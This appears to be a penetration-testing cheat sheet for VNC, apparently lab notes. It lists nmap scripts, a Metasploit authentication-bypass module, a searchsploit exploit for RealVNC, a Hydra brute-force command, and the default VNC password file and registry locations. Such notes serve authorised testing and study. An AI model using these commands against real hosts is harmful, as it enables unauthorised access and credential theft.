VNC 5800 5900
1. Nmap - VNC Information and Vulnerability Scanning:
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.132. Metasploit - RealVNC Authentication Bypass
use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run3. RealVNC Authentication Bypass (Exploit):
sudo searchsploit -m windows/remote/36932.py
python2 36932.py #input target IP4. Hydra - Brute-forcing VNC
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV5. Password Default Locations
~/.vnc/passwdHKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserverHKEY_CURRENT_USER\Software\TightVNC\ServerHKEY_LOCAL_USER\Software\TigerVNC\WinVNC4C:\Program Files\UltraVNC\ultravnc.ini
Last updated